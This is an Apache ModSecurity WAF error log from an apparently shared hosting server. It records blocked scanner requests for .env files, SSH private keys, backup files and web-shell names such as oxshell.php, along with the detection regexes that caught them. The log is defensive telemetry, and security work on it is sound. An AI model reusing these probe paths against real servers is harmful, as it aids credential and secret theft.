[Tue May 26 15:01:17.383758 2026] [security2:error] [pid 662057:tid 662242] [client 180.102.110.141:46748] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/"] [unique_id "ahVoZfT3lMm9tGFVg9Rm8wAAAUE"]
[Tue May 26 15:01:17.829496 2026] [security2:error] [pid 662057:tid 662195] [client 4.193.189.92:4492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/info.php"] [unique_id "ahVoZfT3lMm9tGFVg9RnAwAAARI"]
[Tue May 26 15:01:18.558113 2026] [security2:error] [pid 662057:tid 662273] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoZvT3lMm9tGFVg9RnCQAAAWA"]
[Tue May 26 15:01:18.622336 2026] [security2:error] [pid 662057:tid 662270] [client 195.178.110.34:40496] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/web/.env"] [unique_id "ahVoZvT3lMm9tGFVg9RnGQAAAV0"]
[Tue May 26 15:01:18.657678 2026] [security2:error] [pid 662057:tid 662275] [client 4.193.189.92:1249] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/inputs.php"] [unique_id "ahVoZvT3lMm9tGFVg9RnGgAAAWI"]
[Tue May 26 15:01:19.158551 2026] [security2:error] [pid 662057:tid 662243] [client 136.243.220.209:54635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoZ_T3lMm9tGFVg9RnKAAAAUI"]
[Tue May 26 15:01:19.411608 2026] [security2:error] [pid 662057:tid 662237] [client 4.193.189.92:5417] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/item.php"] [unique_id "ahVoZ_T3lMm9tGFVg9RnLwAAATw"]
[Tue May 26 15:01:20.134390 2026] [security2:error] [pid 662057:tid 662298] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoZ_T3lMm9tGFVg9RnOAAAAXk"]
[Tue May 26 15:01:20.236235 2026] [security2:error] [pid 662057:tid 662303] [client 4.193.189.92:1237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/k.php"] [unique_id "ahVoaPT3lMm9tGFVg9RnTQAAAX4"]
[Tue May 26 15:01:20.387440 2026] [security2:error] [pid 662057:tid 662117] [remote 124.156.212.23:27056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.212.156.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVoaPT3lMm9tGFVg9RnTAABLjs"]
[Tue May 26 15:01:21.058451 2026] [security2:error] [pid 662057:tid 662221] [client 4.193.189.92:12409] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/license.php"] [unique_id "ahVoafT3lMm9tGFVg9RnXgAAASw"]
[Tue May 26 15:01:21.862103 2026] [security2:error] [pid 662057:tid 662314] [client 4.193.189.92:5414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/load.php"] [unique_id "ahVoafT3lMm9tGFVg9RnbwAAAYk"]
[Tue May 26 15:01:22.631566 2026] [security2:error] [pid 662057:tid 662191] [client 136.243.220.209:43911] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoavT3lMm9tGFVg9RniAAAAQ4"]
[Tue May 26 15:01:22.659473 2026] [security2:error] [pid 662057:tid 662290] [client 4.193.189.92:6891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/manager.php"] [unique_id "ahVoavT3lMm9tGFVg9RniQAAAXE"]
[Tue May 26 15:01:23.143674 2026] [security2:error] [pid 662057:tid 662208] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoavT3lMm9tGFVg9RnjAAAAR8"]
[Tue May 26 15:01:23.507114 2026] [security2:error] [pid 662057:tid 662221] [client 4.193.189.92:2161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/media.php"] [unique_id "ahVoa_T3lMm9tGFVg9RnqAAAASw"]
[Tue May 26 15:01:23.801230 2026] [security2:error] [pid 662057:tid 662232] [client 85.121.127.29:58486] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "strapptech.com"] [uri "/.env"] [unique_id "ahVoa_T3lMm9tGFVg9RntwAAATc"]
[Tue May 26 15:01:23.801247 2026] [security2:error] [pid 662057:tid 662207] [client 85.121.127.29:58512] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "strapptech.com"] [uri "/backend/.env"] [unique_id "ahVoa_T3lMm9tGFVg9RntQAAAR4"]
[Tue May 26 15:01:23.801771 2026] [security2:error] [pid 662057:tid 662271] [client 85.121.127.29:58514] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "strapptech.com"] [uri "/app/.env"] [unique_id "ahVoa_T3lMm9tGFVg9RnvQAAAV4"]
[Tue May 26 15:01:23.802195 2026] [security2:error] [pid 662057:tid 662249] [client 85.121.127.29:58508] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "strapptech.com"] [uri "/api/.env"] [unique_id "ahVoa_T3lMm9tGFVg9RnwgAAAUg"]
[Tue May 26 15:01:23.802360 2026] [security2:error] [pid 662057:tid 662281] [client 85.121.127.29:58518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "strapptech.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVoa_T3lMm9tGFVg9RnwAAAAWg"]
[Tue May 26 15:01:23.802364 2026] [security2:error] [pid 662057:tid 662259] [client 85.121.127.29:58498] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "strapptech.com"] [uri "/.env.bak"] [unique_id "ahVoa_T3lMm9tGFVg9RnuAAAAVI"]
[Tue May 26 15:01:23.803125 2026] [security2:error] [pid 662057:tid 662220] [client 85.121.127.29:58496] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "strapptech.com"] [uri "/.env.backup"] [unique_id "ahVoa_T3lMm9tGFVg9RnwwAAASs"]
[Tue May 26 15:01:23.804003 2026] [security2:error] [pid 662057:tid 662292] [client 85.121.127.29:58500] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "strapptech.com"] [uri "/.env.old"] [unique_id "ahVoa_T3lMm9tGFVg9RnwQAAAXM"]
[Tue May 26 15:01:23.804329 2026] [security2:error] [pid 662057:tid 662198] [client 85.121.127.29:58516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "strapptech.com"] [uri "/public/.env"] [unique_id "ahVoa_T3lMm9tGFVg9RnzwAAARU"]
[Tue May 26 15:01:24.310268 2026] [security2:error] [pid 662057:tid 662302] [client 4.193.189.92:7375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/mar.php"] [unique_id "ahVobPT3lMm9tGFVg9RoEAAAAX0"]
[Tue May 26 15:01:25.061516 2026] [security2:error] [pid 662057:tid 662260] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVobPT3lMm9tGFVg9RoGwAAAVM"]
[Tue May 26 15:01:25.087141 2026] [security2:error] [pid 662057:tid 662300] [client 4.193.189.92:3164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/my1.php"] [unique_id "ahVobfT3lMm9tGFVg9RoKAAAAXs"]
[Tue May 26 15:01:25.144019 2026] [security2:error] [pid 662057:tid 662173] [remote 62.93.179.166:56968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cessioneunquinto.com"] [uri "/.env"] [unique_id "ahVobfT3lMm9tGFVg9RoKQABYXM"]
[Tue May 26 15:01:25.387925 2026] [security2:error] [pid 662057:tid 662191] [client 85.121.127.29:58522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "strapptech.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVobfT3lMm9tGFVg9RoLQAAAQ4"]
[Tue May 26 15:01:25.675386 2026] [security2:error] [pid 662057:tid 662269] [client 195.178.110.34:45768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/web/.env"] [unique_id "ahVobfT3lMm9tGFVg9RoPQAAAVw"]
[Tue May 26 15:01:25.885760 2026] [security2:error] [pid 662057:tid 662250] [client 4.193.189.92:7941] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/mm.php"] [unique_id "ahVobfT3lMm9tGFVg9RoPwAAAUk"]
[Tue May 26 15:01:26.435010 2026] [security2:error] [pid 662057:tid 662298] [client 185.191.171.14:32824] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/preschool/day/2026-04-23/"] [unique_id "ahVobvT3lMm9tGFVg9RoVQAAAXk"]
[Tue May 26 15:01:26.435137 2026] [security2:error] [pid 662057:tid 662298] [client 185.191.171.14:32824] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/preschool/day/2026-04-23/"] [unique_id "ahVobvT3lMm9tGFVg9RoVQAAAXk"]
[Tue May 26 15:01:26.670559 2026] [security2:error] [pid 662057:tid 662262] [client 4.193.189.92:6484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/network.php"] [unique_id "ahVobvT3lMm9tGFVg9RoWwAAAVU"]
[Tue May 26 15:01:26.827689 2026] [security2:error] [pid 662057:tid 662261] [client 139.180.231.213:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVobvT3lMm9tGFVg9RoXwAAAVQ"], referer: https://www.anujtradingco.com/
[Tue May 26 15:01:26.961045 2026] [security2:error] [pid 662057:tid 662304] [client 136.243.220.209:30942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVobvT3lMm9tGFVg9RoZgAAAX8"]
[Tue May 26 15:01:27.481998 2026] [security2:error] [pid 662057:tid 662265] [client 4.193.189.92:2172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/new.php"] [unique_id "ahVob_T3lMm9tGFVg9RorgAAAVg"]
[Tue May 26 15:01:27.722885 2026] [security2:error] [pid 662057:tid 662295] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVob_T3lMm9tGFVg9RopAAAAXY"]
[Tue May 26 15:01:28.270731 2026] [security2:error] [pid 662057:tid 662196] [client 4.193.189.92:5620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/0x.php"] [unique_id "ahVocPT3lMm9tGFVg9RoywAAARM"]
[Tue May 26 15:01:28.341460 2026] [security2:error] [pid 662057:tid 662222] [client 139.180.231.213:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVocPT3lMm9tGFVg9RoygAAAS0"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1284631&moderation-hash=b7b24dfadfb9492da7837fe6576c15a5
[Tue May 26 15:01:29.050246 2026] [security2:error] [pid 662057:tid 662191] [client 4.193.189.92:1515] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/0.php"] [unique_id "ahVocfT3lMm9tGFVg9Ro2gAAAQ4"]
[Tue May 26 15:01:29.825099 2026] [security2:error] [pid 662057:tid 662311] [client 4.193.189.92:9480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/oxshell.php"] [unique_id "ahVocfT3lMm9tGFVg9Ro7wAAAYY"]
[Tue May 26 15:01:29.913372 2026] [security2:error] [pid 662057:tid 662232] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVocfT3lMm9tGFVg9Ro6QAAATc"]
[Tue May 26 15:01:30.634764 2026] [security2:error] [pid 662057:tid 662188] [client 4.193.189.92:1235] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/php8.php"] [unique_id "ahVocvT3lMm9tGFVg9RpAQAAAQs"]
[Tue May 26 15:01:30.667662 2026] [security2:error] [pid 662057:tid 662229] [client 136.243.220.209:51474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVocvT3lMm9tGFVg9RpAgAAATQ"]
[Tue May 26 15:01:31.485606 2026] [security2:error] [pid 662057:tid 662227] [client 4.193.189.92:3443] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/p.php"] [unique_id "ahVoc_T3lMm9tGFVg9RpIgAAATI"]
[Tue May 26 15:01:31.681427 2026] [security2:error] [pid 662057:tid 662223] [client 195.178.110.34:45784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/web/.env"] [unique_id "ahVoc_T3lMm9tGFVg9RpJwAAAS4"]
[Tue May 26 15:01:31.946559 2026] [security2:error] [pid 662057:tid 662237] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoc_T3lMm9tGFVg9RpJQAAATw"]
[Tue May 26 15:01:32.298437 2026] [security2:error] [pid 662057:tid 662246] [client 4.193.189.92:2114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/php.php"] [unique_id "ahVodPT3lMm9tGFVg9RpRgAAAUU"]
[Tue May 26 15:01:32.410671 2026] [security2:error] [pid 662057:tid 662228] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVodPT3lMm9tGFVg9RpSgAAATM"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1230859&moderation-hash=2aac02f82ca332a981ba185237eedd5a
[Tue May 26 15:01:32.987686 2026] [security2:error] [pid 662057:tid 662187] [client 83.50.252.74:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVodPT3lMm9tGFVg9RpXQAAAQo"]
[Tue May 26 15:01:33.048969 2026] [security2:error] [pid 662057:tid 662281] [client 4.193.189.92:9533] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/past.php"] [unique_id "ahVodfT3lMm9tGFVg9RpbgAAAWg"]
[Tue May 26 15:01:33.328024 2026] [security2:error] [pid 662057:tid 662198] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVodfT3lMm9tGFVg9RpdgAAARU"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1230859&moderation-hash=2aac02f82ca332a981ba185237eedd5a
